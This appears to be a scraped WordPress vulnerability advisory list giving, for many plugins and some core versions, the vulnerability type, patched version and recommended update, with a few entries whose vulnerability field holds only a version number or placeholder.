Plugin: Auto Amazon Links – Amazon Associates Affiliate Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Video List Manager

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Missing Authorization
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: FareHarbor for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘saveRedirectSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress form builder plugin for contact forms, surveys and quizzes – Tripetto

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: wp-noexternallinks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.19
Recommended Action: Update to version 3.5.19, or a newer patched version

Plugin: O2tweet

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Role by BestWebSoft – Add and Customize Roles and Capabilities in WordPress

Vulnerability: Cross-Site Request Forgery to Privilege Escalation
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 9.6.2
Recommended Action: Update to version 9.6.2, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 8.0.4
Recommended Action: Update to version 8.0.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.94
Recommended Action: Update to version 2.9.94, or a newer patched version

Plugin: Portfolio for Elementor & Image Gallery | PowerFolio

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: HTML5 MP3 Player with Folder Feedburner Playlist Free

Vulnerability: Authenticated (Author+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.7.2
Recommended Action: Update to version 1.0.7.2, or a newer patched version

Plugin: Hotel Booking

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: CIP4 Folder Download Widget

Vulnerability: Local File Inclusion
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: filedownload

Vulnerability: Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: SocialGrid

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.5.35
Recommended Action: Update to version 1.5.35, or a newer patched version

Plugin: JS Multi Hotel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Content by Country (by Shield Security)

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via wpglobus_option[selector_wp_list_pages][show_selector]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: wp-lytebox

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Book appointment online

Vulnerability: Cross-Site Scripting
Patched Version: 1.39
Recommended Action: Update to version 1.39, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated (or Cross-Site Request Forgery) Blind SQL Injection
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: AppMySite – Create an app with the Best Mobile App Builder

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 3.11.1
Recommended Action: Update to version 3.11.1, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: WP-EMail

Vulnerability: Cross-Site Request Forgery to Log Deletion
Patched Version: 2.69.0
Recommended Action: Update to version 2.69.0, or a newer patched version

Plugin: WP Zoho for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms – CRM, Bigin

Vulnerability: Cross-Site Request Forgery via settings_page function
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Social Media Icons Widget

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Recent Posts Slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Open Redirect
Patched Version: 3.8.2.3
Recommended Action: Update to version 3.8.2.3, or a newer patched version

Plugin: WP-Curriculo Vitae Free

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple SEO

Vulnerability: Cross-Site Request Forgery to Sitemap Deletion/Creation
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

Plugin: Libsyn Publisher Hub

Vulnerability: Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WPS Cleaner

Vulnerability: Arbitrary Media File Disclosure
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.6.1.1
Recommended Action: Update to version 1.6.1.1, or a newer patched version

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 24.0
Recommended Action: Update to version 24.0, or a newer patched version

Plugin: Video Slider – Slider Carousel

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal during unzip
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Core: WordPress

Vulnerability: Path Disclosure
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: BMI Calculator Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Job Manager

Vulnerability: < 0.7.23
Patched Version: 0.7.23
Recommended Action: Update to version 0.7.23, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Authenticated (Contributor+) Privilege Escalation
Patched Version: 5.8.9
Recommended Action: Update to version 5.8.9, or a newer patched version

Plugin: My Link Order

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Nested Pages

Vulnerability: Missing Authorization to Authenticated (Editor+) Plugin Settings Reset
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Newsletters

Vulnerability: Object Injection
Patched Version: 4.6.8.6
Recommended Action: Update to version 4.6.8.6, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1

Plugin: Ninja Forms – File Uploads

Vulnerability: File Uploads Extension <= 3.3.12
Patched Version: 3.3.13
Recommended Action: Update to version 3.3.13, or a newer patched version

Plugin: Controlled Admin Access

Vulnerability: Privilege Escalation
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Booking Package

Vulnerability: Unauthenticated Sensitive Data Disclosure
Patched Version: 1.5.29
Recommended Action: Update to version 1.5.29, or a newer patched version

Plugin: wordTube

Vulnerability: Directory Traversal and File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Path Traversal
Patched Version: 0.9.76
Recommended Action: Update to version 0.9.76, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.1.77
Recommended Action: Update to version 1.1.77, or a newer patched version

Plugin: Garden Gnome Package

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.20.0
Recommended Action: Update to version 1.20.0, or a newer patched version

Plugin: WP Admin Style

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SQL Shortcode

Vulnerability: SQL Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Code Snippets Extended

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Contributor+) Directory Traversal via Shortcodes
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 6.4.2.5
Recommended Action: Update to version 6.4.2.5, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: WebLibrarian

Vulnerability: SQL Injection
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: Restaurant Menu and Food Ordering

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Backup Migration

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Authenticated (Administrator+) Directory Traversal to Arbitrary File Deletion
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: WP Job Board

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Private Messages For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LinkedIn Company Updates

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Squirrly SEO – Advanced Pack

Vulnerability: Advanced Pack <= 2.3.8
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: 5.0.7
Patched Version: 5.0.8
Recommended Action: Update to version 5.0.8, or a newer patched version

Plugin: MDC Private Message

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Peter’s Custom Anti-Spam

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Authenticated Stored Cross-Site Scripting via IP setting
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via post slugs
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Video Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Administrator+) Blind Server-Side Request Forgery
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: GoToWP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Breadcrumbs by menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: No subtitle
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Remote Code Execution
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.12
Recommended Action: Update to version 3.1.12, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_save_folder_order
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Simple Org Chart

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dynamic Widgets

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: WP Inimat

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.8
Recommended Action: Update to version 3.3.8, or a newer patched version

Plugin: Get Custom Field Values

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.8.2
Recommended Action: Update to version 1.1.8.2, or a newer patched version

Plugin: WP Editor

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Simple Podcasting

Vulnerability: Prototype Pollution
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Wbcom Designs – BuddyPress Group Reviews

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Members Import

Vulnerability: Cross-Site Request Forgery to User Import and Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Order Your Posts Manually

Vulnerability: Reflected Cross-Site Scripting via ‘_user_request’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FoxyPress

Vulnerability: Cross-Site Scripting
Patched Version: 0.4.2.7
Recommended Action: Update to version 0.4.2.7, or a newer patched version

Plugin: Template Debugger

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plugin LBstopattack

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: LeadSquared Suite

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Testimonials

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Kento Post View Counter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Report Post

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Affiliate Pro

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Rock Convert

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: WR ContactForm

Vulnerability: SQL Injection
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Exports and Reports

Vulnerability: CSV Injection
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: Responsive Slider – Image Slider – Slideshow for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: affiliate-toolkit – WP Affiliate Plugin with Amazon

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: WPS Bidouille

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Core: WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: Blaze Slideshow

Vulnerability: Arbitrary File Upload
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: JetWidgets For Elementor

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.30
Recommended Action: Update to version 2.3.30, or a newer patched version

Plugin: Hero Banner Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: AddToAny Share Buttons

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.48
Recommended Action: Update to version 1.7.48, or a newer patched version

Plugin: Sideblog WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Outbound Link Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pre-Publish Checklist

Vulnerability: Insecure Direct Object Reference to Arbitrary Post ‘_ppc_meta_key’ Update
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.6.67
Recommended Action: Update to version 3.6.67, or a newer patched version

Plugin: Newsletters

Vulnerability: Directory Traversal
Patched Version: 4.6.4.3
Recommended Action: Update to version 4.6.4.3, or a newer patched version

Plugin: Very Simple Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: WP Users Media

Vulnerability: Missing Authorization via wpusme_save_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: A Better Search Free & Premium <= 2.16.3 & 4.14.3
Patched Version: 2.16.4
Recommended Action: Update to version 2.16.4, or a newer patched version

Plugin: White Label Branding for Elementor Page Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Tickets and Registration

Vulnerability: CSV Injection
Patched Version: 4.10.7.2
Recommended Action: Update to version 4.10.7.2, or a newer patched version

Plugin: Curtain

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kaswara Modern VC Addons

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Extensions for Leaflet Map

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Unauthenticated Events Export
Patched Version: 5.16.5
Recommended Action: Update to version 5.16.5, or a newer patched version

Plugin: Security Optimizer – The All-In-One Protection Plugin

Vulnerability: Authorization Weakness to Authentication Bypass
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: 3.1.1.4.1
Patched Version: 3.1.1.4.2
Recommended Action: Update to version 3.1.1.4.2, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Unauthenticated Plugin Settings Reset
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.50
Recommended Action: Update to version 2.1.50, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.6.1
Recommended Action: Update to version 7.6.1, or a newer patched version

Plugin: WP Construction Mode

Vulnerability: Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Pondol Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All in One Time Clock Lite – Tracking Employee Time Has Never Been Easier

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.321
Recommended Action: Update to version 1.3.321, or a newer patched version

Plugin: Bamboo Columns

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Invoices

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 3.6.9
Recommended Action: Update to version 3.6.9, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Hide Admin Bar Based on User Roles

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Easy Banners

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: HTTP Headers

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.18.9
Recommended Action: Update to version 1.18.9, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

